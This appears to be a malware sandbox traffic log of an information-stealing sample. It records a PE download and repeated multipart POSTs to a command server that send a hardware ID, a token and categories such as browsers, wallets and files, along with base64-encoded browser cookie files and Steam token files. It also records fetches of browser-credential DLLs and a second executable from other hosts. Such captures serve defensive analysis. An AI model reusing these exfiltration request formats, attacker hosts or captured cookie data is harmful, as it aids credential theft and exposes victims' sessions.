Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 27 Jun 2024 03:59:04 GMTContent-Type: application/octet-streamContent-Length: 2515456Last-Modified: Thu, 27 Jun 2024 00:29:28 GMTConnection: keep-aliveETag: "667cb268-266200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4a 8c 64 5a 0e ed 0a 09 0e ed 0a 09 0e ed 0a 09 61 9b a1 09 16 ed 0a 09 61 9b 94 09 03 ed 0a 09 61 9b a0 09 35 ed 0a 09 07 95 89 09 0d ed 0a 09 07 95 99 09 0c ed 0a 09 8e 94 0b 08 0d ed 0a 09 0e ed 0b 09 5a ed 0a 09 61 9b a5 09 01 ed 0a 09 61 9b 97 09 0f ed 0a 09 52 69 63 68 0e ed 0a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 89 fa 75 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ac 01 00 00 e8 21 00 00 00 00 00 4c 58 be 00 00 10 00 00 00 c0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 be 00 00 04 00 00 00 00 00 00 02 00 40 80 00 00 20 00 00 20 00 00 00 00 20 00 00 20 00 00 00 00 00 00 10 00 00 00 20 70 9c 00 57 0d 00 00 78 7d 9c 00 0c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 9c 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 01 00 00 10 00 00 00 a4 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 80 00 00 00 c0 01 00 00 40 00 00 00 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 30 21 00 00 40 02 00 00 04 00 00 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 50 00 00 00 70 23 00 00 20 00 00 00 ec 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 80 78 00 00 c0 23 00 00 28 03 00 00 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 64 61 74 61 00 00 00 00 30 22 00 00 40 9c 00 00 2e 22 00 00 34 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCAECGIEBKJKEBGDHDAHost: 85.28.47.4Content-Length: 212Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 43 41 45 43 47 49 45 42 4b 4a 4b 45 42 47 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 44 33 37 35 37 39 31 41 30 45 41 32 30 33 37 39 30 32 36 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 45 43 47 49 45 42 4b 4a 4b 45 42 47 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 45 43 47 49 45 42 4b 4a 4b 45 42 47 44 48 44 41 2d 2d 0d 0a Data Ascii: ------DHCAECGIEBKJKEBGDHDAContent-Disposition: form-data; name="hwid"ED375791A0EA20379026------DHCAECGIEBKJKEBGDHDAContent-Disposition: form-data; name="build"default------DHCAECGIEBKJKEBGDHDA--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBFCFBFBFBKFIDHJKFCAHost: 85.28.47.4Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 64 36 34 34 64 32 38 64 33 66 65 61 63 30 30 39 31 39 35 63 35 66 39 35 35 32 32 62 30 30 61 30 34 62 65 36 30 38 36 61 36 31 61 62 37 62 38 39 34 63 66 38 32 30 35 37 65 36 34 66 35 30 65 30 37 34 65 66 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 2d 2d 0d 0a Data Ascii: ------CBFCFBFBFBKFIDHJKFCAContent-Disposition: form-data; name="token"9d644d28d3feac009195c5f95522b00a04be6086a61ab7b894cf82057e64f50e074ef402------CBFCFBFBFBKFIDHJKFCAContent-Disposition: form-data; name="message"browsers------CBFCFBFBFBKFIDHJKFCA--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKKFCBAKKFBGCBFHJDGHost: 85.28.47.4Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 43 42 41 4b 4b 46 42 47 43 42 46 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 64 36 34 34 64 32 38 64 33 66 65 61 63 30 30 39 31 39 35 63 35 66 39 35 35 32 32 62 30 30 61 30 34 62 65 36 30 38 36 61 36 31 61 62 37 62 38 39 34 63 66 38 32 30 35 37 65 36 34 66 35 30 65 30 37 34 65 66 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 43 42 41 4b 4b 46 42 47 43 42 46 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 43 42 41 4b 4b 46 42 47 43 42 46 48 4a 44 47 2d 2d 0d 0a Data Ascii: ------DBKKFCBAKKFBGCBFHJDGContent-Disposition: form-data; name="token"9d644d28d3feac009195c5f95522b00a04be6086a61ab7b894cf82057e64f50e074ef402------DBKKFCBAKKFBGCBFHJDGContent-Disposition: form-data; name="message"plugins------DBKKFCBAKKFBGCBFHJDG--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDAKJKFCFBGCBGDHCBHost: 85.28.47.4Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 64 36 34 34 64 32 38 64 33 66 65 61 63 30 30 39 31 39 35 63 35 66 39 35 35 32 32 62 30 30 61 30 34 62 65 36 30 38 36 61 36 31 61 62 37 62 38 39 34 63 66 38 32 30 35 37 65 36 34 66 35 30 65 30 37 34 65 66 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 2d 2d 0d 0a Data Ascii: ------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="token"9d644d28d3feac009195c5f95522b00a04be6086a61ab7b894cf82057e64f50e074ef402------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="message"fplugins------AFHDAKJKFCFBGCBGDHCB--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHIIEHJKKECGCBFIIJDHost: 85.28.47.4Content-Length: 6107Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/sqlite3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGHJJEHDHCAAKFIIDGIHost: 85.28.47.4Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 64 36 34 34 64 32 38 64 33 66 65 61 63 30 30 39 31 39 35 63 35 66 39 35 35 32 32 62 30 30 61 30 34 62 65 36 30 38 36 61 36 31 61 62 37 62 38 39 34 63 66 38 32 30 35 37 65 36 34 66 35 30 65 30 37 34 65 66 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 77 4f 44 41 79 43 55 35 4a 52 41 6b 31 4d 54 45 39 56 55 4a 6c 54 6b 4e 72 57 6a 4e 4d 4f 48 6c 59 59 33 67 34 63 57 67 30 53 6b 5a 56 57 47 74 33 61 30 35 44 4f 55 6c 79 5a 47 6c 53 5a 47 4a 71 55 31 52 71 63 56 4e 70 52 6d 67 34 56 33 4a 53 59 32 4a 4c 63 6c 39 79 54 30 70 69 5a 30 68 5a 4e 6c 52 42 4e 46 4a 55 4c 54 5a 77 63 7a 42 69 61 47 56 74 5a 6e 64 44 55 45 4a 7a 54 45 31 6e 55 46 51 33 4c 57 64 55 59 31 64 78 53 48 5a 61 64 6c 70 69 59 57 5a 50 63 47 74 78 55 6e 6b 77 5a 45 78 35 57 55 63 35 51 57 70 51 4d 6e 5a 69 56 55 4a 76 62 57 46 79 62 6d 4d 35 63 47 4e 61 56 6d 78 6f 53 47 74 56 5a 56 56 68 56 30 31 31 63 6b 51 77 52 30 64 59 65 56 63 77 4e 56 39 43 58 7a 46 4a 65 56 56 4f 57 55 56 46 54 47 31 35 63 56 4a 6e 43 69 35 6e 62 32 39 6e 62 47 55 75 59 32 39 74 43 56 52 53 56 55 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 6a 6b 35 4d 44 63 78 4e 6a 51 77 43 54 46 51 58 30 70 42 55 67 6b 79 4d 44 49 7a 4c 54 45 77 4c 54 41 31 4c 54 41 32 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 2d 2d 0d 0a Data Ascii: ------ECGHJJEHDHCAAKFIIDGIContent-Disposition: form-data; name="token"9d644d28d3feac009195c5f95522b00a04be6086a61ab7b894cf82057e64f50e074ef402------ECGHJJEHDHCAAKFIIDGIContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------ECGHJJEHDHCAAKFIIDGIContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nUFQ3L
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKEHIEBKJKFIEBGDGDAAHost: 85.28.47.4Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 45 48 49 45 42 4b 4a 4b 46 49 45 42 47 44 47 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 64 36 34 34 64 32 38 64 33 66 65 61 63 30 30 39 31 39 35 63 35 66 39 35 35 32 32 62 30 30 61 30 34 62 65 36 30 38 36 61 36 31 61 62 37 62 38 39 34 63 66 38 32 30 35 37 65 36 34 66 35 30 65 30 37 34 65 66 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 48 49 45 42 4b 4a 4b 46 49 45 42 47 44 47 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 48 49 45 42 4b 4a 4b 46 49 45 42 47 44 47 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 48 49 45 42 4b 4a 4b 46 49 45 42 47 44 47 44 41 41 2d 2d 0d 0a Data Ascii: ------KKEHIEBKJKFIEBGDGDAAContent-Disposition: form-data; name="token"9d644d28d3feac009195c5f95522b00a04be6086a61ab7b894cf82057e64f50e074ef402------KKEHIEBKJKFIEBGDGDAAContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------KKEHIEBKJKFIEBGDGDAAContent-Disposition: form-data; name="file"------KKEHIEBKJKFIEBGDGDAA--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKKJKEHDBGIDGDHCFHIHost: 85.28.47.4Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 64 36 34 34 64 32 38 64 33 66 65 61 63 30 30 39 31 39 35 63 35 66 39 35 35 32 32 62 30 30 61 30 34 62 65 36 30 38 36 61 36 31 61 62 37 62 38 39 34 63 66 38 32 30 35 37 65 36 34 66 35 30 65 30 37 34 65 66 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 2d 2d 0d 0a Data Ascii: ------KJKKJKEHDBGIDGDHCFHIContent-Disposition: form-data; name="token"9d644d28d3feac009195c5f95522b00a04be6086a61ab7b894cf82057e64f50e074ef402------KJKKJKEHDBGIDGDHCFHIContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------KJKKJKEHDBGIDGDHCFHIContent-Disposition: form-data; name="file"------KJKKJKEHDBGIDGDHCFHI--
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/freebl3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/mozglue.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/msvcp140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/nss3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/softokn3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/vcruntime140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEBFHIJECFIDGDGCGHCGHost: 85.28.47.4Content-Length: 947Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJKECAAAFHJECAAAEBFHost: 85.28.47.4Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 64 36 34 34 64 32 38 64 33 66 65 61 63 30 30 39 31 39 35 63 35 66 39 35 35 32 32 62 30 30 61 30 34 62 65 36 30 38 36 61 36 31 61 62 37 62 38 39 34 63 66 38 32 30 35 37 65 36 34 66 35 30 65 30 37 34 65 66 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 2d 2d 0d 0a Data Ascii: ------GHJKECAAAFHJECAAAEBFContent-Disposition: form-data; name="token"9d644d28d3feac009195c5f95522b00a04be6086a61ab7b894cf82057e64f50e074ef402------GHJKECAAAFHJECAAAEBFContent-Disposition: form-data; name="message"wallets------GHJKECAAAFHJECAAAEBF--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEHIDAKECFIEBGDHJEBKHost: 85.28.47.4Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 64 36 34 34 64 32 38 64 33 66 65 61 63 30 30 39 31 39 35 63 35 66 39 35 35 32 32 62 30 30 61 30 34 62 65 36 30 38 36 61 36 31 61 62 37 62 38 39 34 63 66 38 32 30 35 37 65 36 34 66 35 30 65 30 37 34 65 66 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 2d 2d 0d 0a Data Ascii: ------AEHIDAKECFIEBGDHJEBKContent-Disposition: form-data; name="token"9d644d28d3feac009195c5f95522b00a04be6086a61ab7b894cf82057e64f50e074ef402------AEHIDAKECFIEBGDHJEBKContent-Disposition: form-data; name="message"files------AEHIDAKECFIEBGDHJEBK--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGHJJEHDHCAAKFIIDGIHost: 85.28.47.4Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 64 36 34 34 64 32 38 64 33 66 65 61 63 30 30 39 31 39 35 63 35 66 39 35 35 32 32 62 30 30 61 30 34 62 65 36 30 38 36 61 36 31 61 62 37 62 38 39 34 63 66 38 32 30 35 37 65 36 34 66 35 30 65 30 37 34 65 66 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 2d 2d 0d 0a Data Ascii: ------ECGHJJEHDHCAAKFIIDGIContent-Disposition: form-data; name="token"9d644d28d3feac009195c5f95522b00a04be6086a61ab7b894cf82057e64f50e074ef402------ECGHJJEHDHCAAKFIIDGIContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------ECGHJJEHDHCAAKFIIDGIContent-Disposition: form-data; name="file"------ECGHJJEHDHCAAKFIIDGI--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJJECFIECBGDGCAAAEHHost: 85.28.47.4Content-Length: 270Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 64 36 34 34 64 32 38 64 33 66 65 61 63 30 30 39 31 39 35 63 35 66 39 35 35 32 32 62 30 30 61 30 34 62 65 36 30 38 36 61 36 31 61 62 37 62 38 39 34 63 66 38 32 30 35 37 65 36 34 66 35 30 65 30 37 34 65 66 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 2d 2d 0d 0a Data Ascii: ------HJJJECFIECBGDGCAAAEHContent-Disposition: form-data; name="token"9d644d28d3feac009195c5f95522b00a04be6086a61ab7b894cf82057e64f50e074ef402------HJJJECFIECBGDGCAAAEHContent-Disposition: form-data; name="message"jbdtaijovg------HJJJECFIECBGDGCAAAEH--
Source: global traffic HTTP traffic detected: GET /mine/amadka.exe HTTP/1.1Host: 77.91.77.81Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
